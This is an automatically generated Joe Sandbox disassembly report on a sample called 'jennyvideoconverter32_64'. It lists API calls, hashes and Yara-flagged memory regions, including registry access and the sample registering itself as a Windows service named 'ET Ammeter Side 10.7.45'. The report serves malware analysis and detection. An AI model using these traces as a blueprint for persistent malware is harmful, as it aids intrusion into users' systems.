                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_3_2_400000_jennyvideoconverter32_64.jbxd
                                                                                Similarity
                                                                                • API ID: CreateDirectory
                                                                                • String ID:
                                                                                • API String ID: 4241100979-0
                                                                                • Opcode ID: dd21338a10475b92d35c91b6d7a1eb9cdff4975aba9547ccf27c8b6d8e9fca1c
                                                                                • Instruction ID: 6c2bb403a29e9a4daca0c7564591e9dc5a5c57b0ea50bd6513e4dc3229f0b2d4
                                                                                • Opcode Fuzzy Hash: dd21338a10475b92d35c91b6d7a1eb9cdff4975aba9547ccf27c8b6d8e9fca1c
                                                                                • Instruction Fuzzy Hash: 04B0926448A120E3C00112501E18D6A6818A81974172040B33203700D042B9004232AF
                                                                                APIs
                                                                                • RegSetValueExA.KERNELBASE(?), ref: 0040BAD2
                                                                                Memory Dump Source
                                                                                • Source File: 00000003.00000002.3335479194.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                 • Associated: 00000003.00000002.3335479194.0000000000409000.00000040.00000001.01000000.00000008.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_3_2_400000_jennyvideoconverter32_64.jbxd
                                                                                Similarity
                                                                                • API ID: Value
                                                                                • String ID:
                                                                                • API String ID: 3702945584-0
                                                                                • Opcode ID: f0798ced970cd0eee09a48c3301d522f9189595879b829ecdb2c50a8d54bb03d
                                                                                • Instruction ID: dcbd4d72fe35a2031074dc5c123e8ed0107a6bbbcb0a95934b4016e8c6f2847c
                                                                                • Opcode Fuzzy Hash: f0798ced970cd0eee09a48c3301d522f9189595879b829ecdb2c50a8d54bb03d
                                                                                • Instruction Fuzzy Hash: 69B09270448004FACB050B808C04A7C7E39EB08308F2008A6E003704A0C33A1662BAAF
                                                                                APIs
                                                                                • RegCloseKey.KERNELBASE(?), ref: 0040BAB8
                                                                                Memory Dump Source
                                                                                • Source File: 00000003.00000002.3335479194.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                 • Associated: 00000003.00000002.3335479194.0000000000409000.00000040.00000001.01000000.00000008.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_3_2_400000_jennyvideoconverter32_64.jbxd
                                                                                Similarity
                                                                                • API ID: Close
                                                                                • String ID:
                                                                                • API String ID: 3535843008-0
                                                                                • Opcode ID: 74fdc1d825e6b9643e33f7b1b15225b0ab1e21605966e4fe9622bb3e7052b3ff
                                                                                • Instruction ID: e7ce10565d94f2d6b5d79441531ae5dedac754878596eced195b0ecab70b45c4
                                                                                • Opcode Fuzzy Hash: 74fdc1d825e6b9643e33f7b1b15225b0ab1e21605966e4fe9622bb3e7052b3ff
                                                                                • Instruction Fuzzy Hash: 41B01230D48000D6C60007848E04C5D3E70EE043003204073A323300D0833E60126B4F
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 00000003.00000002.3335479194.0000000000409000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                 • Associated: 00000003.00000002.3335479194.0000000000400000.00000040.00000001.01000000.00000008.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_3_2_400000_jennyvideoconverter32_64.jbxd
                                                                                Similarity
                                                                                • API ID: Close
                                                                                • String ID:
                                                                                • API String ID: 3535843008-0
                                                                                • Opcode ID: 53827522284af458aa1ab5c18d52477b93fa4c5ed2fdaecd456359178508f89c
                                                                                • Instruction ID: 7835f287b7ac2ec363220ad89fda173408b54a468dd99bcfa8236ab55ce49fe7
                                                                                • Opcode Fuzzy Hash: 53827522284af458aa1ab5c18d52477b93fa4c5ed2fdaecd456359178508f89c
                                                                                • Instruction Fuzzy Hash: 3EA00231848001EBC6054B60EF084143EB1E7093013114131E30B705B6C7756575AB4E
                                                                                APIs
                                                                                • RegQueryValueExA.KERNELBASE ref: 00402772
                                                                                Memory Dump Source
                                                                                • Source File: 00000003.00000002.3335479194.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                 • Associated: 00000003.00000002.3335479194.0000000000409000.00000040.00000001.01000000.00000008.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_3_2_400000_jennyvideoconverter32_64.jbxd
                                                                                Similarity
                                                                                • API ID: QueryValue
                                                                                • String ID:
                                                                                • API String ID: 3660427363-0
                                                                                • Opcode ID: dd30d86c2cb366e9c13c8ea6a3dceef0d370df1b95f0ba6f3b87dfe9bf79d56a
                                                                                • Instruction ID: db611a556c80a4156a95494c6baac6c809ed63d2f65f8c354959cc7a17010b18
                                                                                • Opcode Fuzzy Hash: dd30d86c2cb366e9c13c8ea6a3dceef0d370df1b95f0ba6f3b87dfe9bf79d56a
                                                                                • Instruction Fuzzy Hash: CB900220254501AED2108E315E1C3152594654464132288355857E5091EA748051692D
                                                                                APIs
                                                                                  • Part of subcall function 02D91550: OpenEventA.KERNEL32(00100002,00000000,00000000,9D194A3F), ref: 02D915F0
                                                                                  • Part of subcall function 02D91550: CloseHandle.KERNEL32(00000000), ref: 02D91605
                                                                                  • Part of subcall function 02D91550: ResetEvent.KERNEL32(00000000,9D194A3F), ref: 02D9160F
                                                                                  • Part of subcall function 02D91550: CloseHandle.KERNEL32(00000000,9D194A3F), ref: 02D91644
                                                                                • TlsSetValue.KERNEL32(0000002A,?), ref: 02D920EA
                                                                                Memory Dump Source
                                                                                • Source File: 00000003.00000002.3337258779.0000000002D81000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D81000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_3_2_2d81000_jennyvideoconverter32_64.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: CloseEventHandle$OpenResetValue
                                                                                • String ID:
                                                                                • API String ID: 1556185888-0
                                                                                • Opcode ID: 2435b6005c13e19213664412d36f6caa81868bc21e981a68e39adfe54300c6c5
                                                                                • Instruction ID: 406ae2250f693a0d34a1cc52004a36f9961917d866632477e618aeb078ce457b
                                                                                • Opcode Fuzzy Hash: 2435b6005c13e19213664412d36f6caa81868bc21e981a68e39adfe54300c6c5
                                                                                • Instruction Fuzzy Hash: E2014F71A44208EBDB10CF59DC45F5ABBB8EB05661F20476AF82AD3380D771AD148AA4
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 00000003.00000002.3335479194.0000000000409000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                 • Associated: 00000003.00000002.3335479194.0000000000400000.00000040.00000001.01000000.00000008.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_3_2_400000_jennyvideoconverter32_64.jbxd
                                                                                Similarity
                                                                                • API ID: lstrcmpi
                                                                                • String ID:
                                                                                • API String ID: 1586166983-0
APIs
• VirtualAlloc.KERNELBASE(00000000), ref: 0040BA39
Memory Dump Source
• Source File: 00000003.00000002.3335479194.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000003.00000002.3335479194.0000000000409000.00000040.00000001.01000000.00000008.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_400000_jennyvideoconverter32_64.jbxd
Similarity
• API ID: AllocVirtual
• String ID:
• API String ID: 4275171209-0
APIs
Memory Dump Source
• Source File: 00000003.00000002.3335479194.0000000000409000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000003.00000002.3335479194.0000000000400000.00000040.00000001.01000000.00000008.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_400000_jennyvideoconverter32_64.jbxd
Similarity
• API ID: Sleep
• String ID:
• API String ID: 3472027048-0
APIs
Memory Dump Source
• Source File: 00000003.00000002.3335479194.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000003.00000002.3335479194.0000000000409000.00000040.00000001.01000000.00000008.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_400000_jennyvideoconverter32_64.jbxd
Similarity
• API ID: Sleep
• String ID:
• API String ID: 3472027048-0
APIs
• FormatMessageA.KERNEL32(00001200,00000000,?,00000400,?,00000010,00000000), ref: 02D908E2
• GetLastError.KERNEL32(?,00000400,?,00000010,00000000), ref: 02D908EA
Memory Dump Source
• Source File: 00000003.00000002.3337258779.0000000002D81000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D81000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_2d81000_jennyvideoconverter32_64.jbxd
Yara matches
Similarity
• API ID: ErrorFormatLastMessage
• String ID:
• API String ID: 3479602957-0
APIs
• SetUnhandledExceptionFilter.KERNEL32(00000000,?,02D94DD6,?,?,?,00000001), ref: 02D9946D
• UnhandledExceptionFilter.KERNEL32(?,?,?,00000001), ref: 02D99476
Memory Dump Source
• Source File: 00000003.00000002.3337258779.0000000002D81000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D81000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_2d81000_jennyvideoconverter32_64.jbxd
Yara matches
Similarity
• API ID: ExceptionFilterUnhandled
• String ID:
• API String ID: 3192549508-0
APIs
Memory Dump Source
• Source File: 00000003.00000002.3337258779.0000000002D81000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D81000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_2d81000_jennyvideoconverter32_64.jbxd
Yara matches
Similarity
• API ID: _memset
• String ID:
• API String ID: 2102423945-0
APIs
Memory Dump Source
• Source File: 00000003.00000002.3335479194.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000003.00000002.3335479194.0000000000409000.00000040.00000001.01000000.00000008.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_400000_jennyvideoconverter32_64.jbxd
Similarity
• API ID: CreateService
• String ID:
• API String ID: 1592570254-0
APIs
• StartServiceCtrlDispatcherA.ADVAPI32 ref: 004027BE
Memory Dump Source
• Source File: 00000003.00000002.3335479194.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000003.00000002.3335479194.0000000000409000.00000040.00000001.01000000.00000008.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_400000_jennyvideoconverter32_64.jbxd
Similarity
• API ID: CtrlDispatcherServiceStart
• String ID:
• API String ID: 3789849863-0
APIs
• __EH_prolog.LIBCMT ref: 02D824E6
• InterlockedCompareExchange.KERNEL32(?,00000000,00000001), ref: 02D824FC
• RtlEnterCriticalSection.NTDLL(?), ref: 02D8250E
• RtlLeaveCriticalSection.NTDLL(?), ref: 02D8256D
• SetLastError.KERNEL32(00000000,?,7622DFB0), ref: 02D8257F
• GetQueuedCompletionStatus.KERNEL32(?,?,?,?,000001F4,?,7622DFB0), ref: 02D82599
• GetLastError.KERNEL32(?,7622DFB0), ref: 02D825A2
• InterlockedCompareExchange.KERNEL32(?,00000001,00000000), ref: 02D825F0
• InterlockedDecrement.KERNEL32(00000002), ref: 02D8262F
• InterlockedExchange.KERNEL32(00000000,00000000), ref: 02D8268E
• InterlockedExchangeAdd.KERNEL32(?,00000000), ref: 02D82699
• InterlockedExchange.KERNEL32(00000000,00000001), ref: 02D826AD
• PostQueuedCompletionStatus.KERNEL32(?,00000000,00000000,00000000,?,7622DFB0), ref: 02D826BD
• GetLastError.KERNEL32(?,7622DFB0), ref: 02D826C7
Memory Dump Source
• Source File: 00000003.00000002.3337258779.0000000002D81000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D81000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_2d81000_jennyvideoconverter32_64.jbxd
Yara matches
Similarity
• API ID: Interlocked$Exchange$ErrorLast$CompareCompletionCriticalQueuedSectionStatus$DecrementEnterH_prologLeavePost
• String ID:
• API String ID: 1213838671-0
APIs
• RegisterServiceCtrlHandlerA.ADVAPI32(ET Ammeter Side 10.7.45,0040235E), ref: 004023C1
• SetServiceStatus.ADVAPI32(0040A0E0), ref: 00402420
• GetLastError.KERNEL32 ref: 00402422
• CreateEventA.KERNEL32(00000000,00000001,00000000,00000000), ref: 0040242F
• GetLastError.KERNEL32 ref: 00402450
• SetServiceStatus.ADVAPI32(0040A0E0), ref: 00402480
• CreateThread.KERNEL32(00000000,00000000,Function_000022CB,00000000,00000000,00000000), ref: 0040248C
• WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 00402495
• CloseHandle.KERNEL32 ref: 004024A1
• SetServiceStatus.ADVAPI32(0040A0E0), ref: 004024CA
Strings
• ET Ammeter Side 10.7.45, xrefs: 004023BC
Memory Dump Source
• Source File: 00000003.00000002.3335479194.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000003.00000002.3335479194.0000000000409000.00000040.00000001.01000000.00000008.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_400000_jennyvideoconverter32_64.jbxd
Similarity
• API ID: Service$Status$CreateErrorLast$CloseCtrlEventHandleHandlerObjectRegisterSingleThreadWait
• String ID: ET Ammeter Side 10.7.45
• API String ID: 3346042915-2295085586
APIs
• RtlDecodePointer.NTDLL(?), ref: 02D9827A
• _free.LIBCMT ref: 02D98293
  • Part of subcall function 02D92EB4: HeapFree.KERNEL32(00000000,00000000,?,02D95C12,00000000,00000104,76230A60), ref: 02D92EC8
  • Part of subcall function 02D92EB4: GetLastError.KERNEL32(00000000,?,02D95C12,00000000,00000104,76230A60), ref: 02D92EDA
• _free.LIBCMT ref: 02D982A6
• _free.LIBCMT ref: 02D982C4
• _free.LIBCMT ref: 02D982D6
• _free.LIBCMT ref: 02D982E7
• _free.LIBCMT ref: 02D982F2
• _free.LIBCMT ref: 02D98316
• RtlEncodePointer.NTDLL(007BDFB8), ref: 02D9831D
• _free.LIBCMT ref: 02D98332
• _free.LIBCMT ref: 02D98348
• _free.LIBCMT ref: 02D98370
Memory Dump Source
• Source File: 00000003.00000002.3337258779.0000000002D81000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D81000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_2d81000_jennyvideoconverter32_64.jbxd
Yara matches
Similarity
• API ID: _free$Pointer$DecodeEncodeErrorFreeHeapLast
• String ID:
• API String ID: 3064303923-0
APIs
• GetEnvironmentStringsW.KERNEL32(?,00000000,?,?,?,?,00402DE4), ref: 004035B9
• GetEnvironmentStrings.KERNEL32(?,00000000,?,?,?,?,00402DE4), ref: 004035CD
• GetEnvironmentStringsW.KERNEL32(?,00000000,?,?,?,?,00402DE4), ref: 004035F9
• WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000001,00000000,00000000,00000000,00000000,?,00000000,?,?,?,?,00402DE4), ref: 00403631
• WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,00000000,?,?,?,?,00402DE4), ref: 00403653
• FreeEnvironmentStringsW.KERNEL32(00000000,?,00000000,?,?,?,?,00402DE4), ref: 0040366C
• GetEnvironmentStrings.KERNEL32(?,00000000,?,?,?,?,00402DE4), ref: 0040367F
• FreeEnvironmentStringsA.KERNEL32(00000000), ref: 004036BD
Strings
Memory Dump Source
• Source File: 00000003.00000002.3335479194.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000003.00000002.3335479194.0000000000409000.00000040.00000001.01000000.00000008.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_400000_jennyvideoconverter32_64.jbxd
Similarity
• API ID: EnvironmentStrings$ByteCharFreeMultiWide
• String ID: -@
• API String ID: 1823725401-2999422947
APIs
• __EH_prolog.LIBCMT ref: 02D83428
• GetModuleHandleA.KERNEL32(KERNEL32,CancelIoEx), ref: 02D8346B
• GetProcAddress.KERNEL32(00000000), ref: 02D83472
• GetLastError.KERNEL32 ref: 02D83486
• InterlockedCompareExchange.KERNEL32(?,00000000,00000000), ref: 02D834D7
• RtlEnterCriticalSection.NTDLL(00000018), ref: 02D834ED
• RtlLeaveCriticalSection.NTDLL(00000018), ref: 02D83518
Strings
Memory Dump Source
• Source File: 00000003.00000002.3337258779.0000000002D81000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D81000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_2d81000_jennyvideoconverter32_64.jbxd
Yara matches
Similarity
• API ID: CriticalSection$AddressCompareEnterErrorExchangeH_prologHandleInterlockedLastLeaveModuleProc
• String ID: CancelIoEx$KERNEL32
• API String ID: 2902213904-434325024
                                                                                • Opcode ID: 7060e57ff1103dece5f5fb7f44a0a98ed7cfc21b8671b5ffe6236ba4f5c6aa04
                                                                                • Instruction ID: e0e069a832a464486acc351ed8e4c8204967fabae56012f7e1f6566395f44ab2
                                                                                • Opcode Fuzzy Hash: 7060e57ff1103dece5f5fb7f44a0a98ed7cfc21b8671b5ffe6236ba4f5c6aa04
                                                                                • Instruction Fuzzy Hash: 19317C71904205DFEB01AFA8D844AAEBBF9FF49711F1084AAE8199B340D774DD11CBA1
                                                                                APIs
                                                                                • LoadLibraryA.KERNEL32(user32.dll,?,00000000,?,00403D7D,?,Microsoft Visual C++ Runtime Library,00012010,?,00406528,?,00406578,?,?,?,Runtime Error!Program: ), ref: 0040541A
                                                                                • GetProcAddress.KERNEL32(00000000,MessageBoxA), ref: 00405432
                                                                                • GetProcAddress.KERNEL32(00000000,GetActiveWindow), ref: 00405443
                                                                                • GetProcAddress.KERNEL32(00000000,GetLastActivePopup), ref: 00405450
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000003.00000002.3335479194.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000003.00000002.3335479194.0000000000409000.00000040.00000001.01000000.00000008.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_3_2_400000_jennyvideoconverter32_64.jbxd
                                                                                Similarity
                                                                                • API ID: AddressProc$LibraryLoad
                                                                                • String ID: GetActiveWindow$GetLastActivePopup$MessageBoxA$user32.dll$xe@
                                                                                • API String ID: 2238633743-4073082454
                                                                                • Opcode ID: c1c5459b902c6d691e26e6f6b3d5bc075fbf46770f4929c54e66e674ea662e67
                                                                                • Instruction ID: 002c49bf34bfddc632f277928187d9a53126bd14f393e8a72b926efab3457658
                                                                                • Opcode Fuzzy Hash: c1c5459b902c6d691e26e6f6b3d5bc075fbf46770f4929c54e66e674ea662e67
                                                                                • Instruction Fuzzy Hash: E1018431740705AFC7109FB4AD80E6B7AE9FB48791309843BB955F22A1D778C860CF69
                                                                                APIs
                                                                                • GetModuleFileNameA.KERNEL32(00000000,?,00000104,00000000), ref: 00403CC6
                                                                                • GetStdHandle.KERNEL32(000000F4,00406528,00000000,?,00000000,00000000), ref: 00403D9C
                                                                                • WriteFile.KERNEL32(00000000), ref: 00403DA3
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000003.00000002.3335479194.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000003.00000002.3335479194.0000000000409000.00000040.00000001.01000000.00000008.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_3_2_400000_jennyvideoconverter32_64.jbxd
                                                                                Similarity
                                                                                • API ID: File$HandleModuleNameWrite
                                                                                • String ID: ...$<program name unknown>$Microsoft Visual C++ Runtime Library$Runtime Error!Program: $r@
                                                                                • API String ID: 3784150691-1191147370
                                                                                • Opcode ID: d598713df4d839de7fd74915155ccdeaa4efa499b3dc35e679589c6eb5dc5418
                                                                                • Instruction ID: 901e413bd7d296cb1b0b97d790854a8d5494ec17f79a926850544caa0371b074
                                                                                • Opcode Fuzzy Hash: d598713df4d839de7fd74915155ccdeaa4efa499b3dc35e679589c6eb5dc5418
                                                                                • Instruction Fuzzy Hash: F831C772A04208AEEF20EF60DE49F9A776CEF45304F1004BBF545F61C1D6B8AA858A59
                                                                                APIs
                                                                                • LCMapStringW.KERNEL32(00000000,00000100,004065F4,00000001,00000000,00000000,00000103,00000001,00000000,?,004051A5,00200020,00000000,?,00000000,00000000), ref: 00405917
                                                                                • LCMapStringA.KERNEL32(00000000,00000100,004065F0,00000001,00000000,00000000,?,004051A5,00200020,00000000,?,00000000,00000000,00000001), ref: 00405933
                                                                                • LCMapStringA.KERNEL32(00000000,?,00000000,00200020,004051A5,?,00000103,00000001,00000000,?,004051A5,00200020,00000000,?,00000000,00000000), ref: 0040597C
                                                                                • MultiByteToWideChar.KERNEL32(00000000,00000002,00000000,00200020,00000000,00000000,00000103,00000001,00000000,?,004051A5,00200020,00000000,?,00000000,00000000), ref: 004059B4
                                                                                • MultiByteToWideChar.KERNEL32(00000000,00000001,00000000,00200020,?,00000000,?,004051A5,00200020,00000000,?,00000000), ref: 00405A0C
                                                                                • LCMapStringW.KERNEL32(00000000,?,00000000,00000000,00000000,00000000,?,004051A5,00200020,00000000,?,00000000), ref: 00405A22
                                                                                • LCMapStringW.KERNEL32(00000000,?,004051A5,00000000,004051A5,?,?,004051A5,00200020,00000000,?,00000000), ref: 00405A55
                                                                                • LCMapStringW.KERNEL32(00000000,?,?,?,?,00000000,?,004051A5,00200020,00000000,?,00000000), ref: 00405ABD
                                                                                Memory Dump Source
                                                                                • Source File: 00000003.00000002.3335479194.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000003.00000002.3335479194.0000000000409000.00000040.00000001.01000000.00000008.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_3_2_400000_jennyvideoconverter32_64.jbxd
                                                                                Similarity
                                                                                • API ID: String$ByteCharMultiWide
                                                                                • String ID:
                                                                                • API String ID: 352835431-0
                                                                                • Opcode ID: 6e7e0904aad4ffb7df7fa70090622cd283316a6a4d1fe7c3c07164d91eefa06b
                                                                                • Instruction ID: ad677ee5f46337090c489763c5b1535e0d4a7e7cc2f37d679e5ddd81b555dfe6
                                                                                • Opcode Fuzzy Hash: 6e7e0904aad4ffb7df7fa70090622cd283316a6a4d1fe7c3c07164d91eefa06b
                                                                                • Instruction Fuzzy Hash: 8B516C71A00609EFCF218FA5DD85A9F7FB5FB48750F14422AF911B21A0D3398921DF69
                                                                                APIs
                                                                                • OpenEventA.KERNEL32(00100002,00000000,00000000,9D194A3F), ref: 02D915F0
                                                                                • CloseHandle.KERNEL32(00000000), ref: 02D91605
                                                                                • ResetEvent.KERNEL32(00000000,9D194A3F), ref: 02D9160F
                                                                                • CloseHandle.KERNEL32(00000000,9D194A3F), ref: 02D91644
                                                                                • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,9D194A3F), ref: 02D916BA
                                                                                • CloseHandle.KERNEL32(00000000), ref: 02D916CF
                                                                                Memory Dump Source
                                                                                • Source File: 00000003.00000002.3337258779.0000000002D81000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D81000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_3_2_2d81000_jennyvideoconverter32_64.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: CloseEventHandle$CreateOpenReset
                                                                                • String ID:
                                                                                • API String ID: 1285874450-0
                                                                                • Opcode ID: fd59793e34878e10ddbfd3a22be253b3904bce2d918f9716a2f7ff78a676ccac
                                                                                • Instruction ID: 365985178c0209125dca3202165a5a1fedad8156584aa750a2a6d17597a76a5a
                                                                                • Opcode Fuzzy Hash: fd59793e34878e10ddbfd3a22be253b3904bce2d918f9716a2f7ff78a676ccac
                                                                                • Instruction Fuzzy Hash: 8F412975D0435AABDF21CFA5C848BAEBBB8EB05724F144619F819AB380D770DD05CBA0
                                                                                APIs
                                                                                • InterlockedExchange.KERNEL32(?,00000001), ref: 02D820AC
                                                                                • SetWaitableTimer.KERNEL32(00000000,?,00000001,00000000,00000000,00000000), ref: 02D820CD
                                                                                • InterlockedExchangeAdd.KERNEL32(?,00000000), ref: 02D820D8
                                                                                • InterlockedDecrement.KERNEL32(?), ref: 02D8213E
                                                                                • GetQueuedCompletionStatus.KERNEL32(?,?,?,?,000001F4,?), ref: 02D8217A
                                                                                • InterlockedDecrement.KERNEL32(?), ref: 02D82187
                                                                                • InterlockedExchangeAdd.KERNEL32(?,00000000), ref: 02D821A6
                                                                                Memory Dump Source
                                                                                • Source File: 00000003.00000002.3337258779.0000000002D81000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D81000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_3_2_2d81000_jennyvideoconverter32_64.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: Interlocked$Exchange$Decrement$CompletionQueuedStatusTimerWaitable
                                                                                • String ID:
                                                                                • API String ID: 1171374749-0
                                                                                • Opcode ID: adc6b4cb4e3e6989ebd444a012c5fa2da865c35eb780fd680ebcd3cf5547b92c
                                                                                • Instruction ID: e65802c12a27b126a227de01b3ddf5829490c505c5d8ccd7f75f84fc6e9f1387
                                                                                • Opcode Fuzzy Hash: adc6b4cb4e3e6989ebd444a012c5fa2da865c35eb780fd680ebcd3cf5547b92c
                                                                                • Instruction Fuzzy Hash: 36413B755047459FD311EF25D889A6BBBF9EBC8754F100A1EF89A82250D730E909CFA1
                                                                                APIs
                                                                                  • Part of subcall function 02D91E10: OpenEventA.KERNEL32(00100002,00000000,?,?,?,02D9166E,?,?), ref: 02D91E3F
                                                                                  • Part of subcall function 02D91E10: CloseHandle.KERNEL32(00000000,?,?,02D9166E,?,?), ref: 02D91E54
                                                                                  • Part of subcall function 02D91E10: SetEvent.KERNEL32(00000000,02D9166E,?,?), ref: 02D91E67
                                                                                • OpenEventA.KERNEL32(00100002,00000000,00000000,9D194A3F), ref: 02D915F0
                                                                                • CloseHandle.KERNEL32(00000000), ref: 02D91605
                                                                                • ResetEvent.KERNEL32(00000000,9D194A3F), ref: 02D9160F
                                                                                • CloseHandle.KERNEL32(00000000,9D194A3F), ref: 02D91644
                                                                                • __CxxThrowException@8.LIBCMT ref: 02D91675
                                                                                  • Part of subcall function 02D9449A: RaiseException.KERNEL32(?,?,02D8FA92,?,?,?,?,?,?,?,02D8FA92,?,02DB0F78,?), ref: 02D944EF
                                                                                • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,9D194A3F), ref: 02D916BA
                                                                                • CloseHandle.KERNEL32(00000000), ref: 02D916CF
                                                                                  • Part of subcall function 02D91B50: GetCurrentProcessId.KERNEL32(?), ref: 02D91BA9
                                                                                • WaitForSingleObject.KERNEL32(00000000,000000FF,9D194A3F), ref: 02D916DF
                                                                                Memory Dump Source
                                                                                • Source File: 00000003.00000002.3337258779.0000000002D81000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D81000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_3_2_2d81000_jennyvideoconverter32_64.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: Event$CloseHandle$Open$CreateCurrentExceptionException@8ObjectProcessRaiseResetSingleThrowWait
                                                                                • String ID:
                                                                                • API String ID: 2227236058-0
                                                                                • Opcode ID: d2a258f47c21c9e027d5a615a9ce98ddc396fcd268283bca7efb3195e988114e
                                                                                • Instruction ID: cc52c84e5709d8f6797c8c2bc4a728081bdcf1dcc4078833c272557da210864a
                                                                                • Opcode Fuzzy Hash: d2a258f47c21c9e027d5a615a9ce98ddc396fcd268283bca7efb3195e988114e
                                                                                • Instruction Fuzzy Hash: 9D313875E0035AABDF20CBA59C44BADB7B9AF05715F180219F81DAB380E770DD05CB61
                                                                                APIs
                                                                                • HeapAlloc.KERNEL32(00000000,00002020,?,00000000,?,?,00403A36), ref: 00404639
                                                                                • VirtualAlloc.KERNEL32(00000000,00400000,00002000,00000004,?,00000000,?,?,00403A36), ref: 0040465D
                                                                                • VirtualAlloc.KERNEL32(00000000,00010000,00001000,00000004,?,00000000,?,?,00403A36), ref: 00404677
                                                                                • VirtualFree.KERNEL32(00000000,00000000,00008000,?,00000000,?,?,00403A36), ref: 00404738
                                                                                • HeapFree.KERNEL32(00000000,00000000,?,00000000,?,?,00403A36), ref: 0040474F
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000003.00000002.3335479194.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000003.00000002.3335479194.0000000000409000.00000040.00000001.01000000.00000008.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_3_2_400000_jennyvideoconverter32_64.jbxd
                                                                                Similarity
                                                                                • API ID: AllocVirtual$FreeHeap
                                                                                • String ID: r@$r@
                                                                                • API String ID: 714016831-1712950306
                                                                                • Opcode ID: 6146d640eca2786615fae02a601f05dd2cfcbd8d5d5bc8993479f9a7be96b628
                                                                                • Instruction ID: 6d2ae56a8b2e66d9b660bb9c1c671dd7469dd609f739855ae4ec176a3c74651c
                                                                                • Opcode Fuzzy Hash: 6146d640eca2786615fae02a601f05dd2cfcbd8d5d5bc8993479f9a7be96b628
                                                                                • Instruction Fuzzy Hash: 3531BEB0940702ABD3309F24DD44B66B7A4EB86755F11463BF265BB2D0E7B8A8418B4D
                                                                                APIs
                                                                                • __init_pointers.LIBCMT ref: 02D95CD4
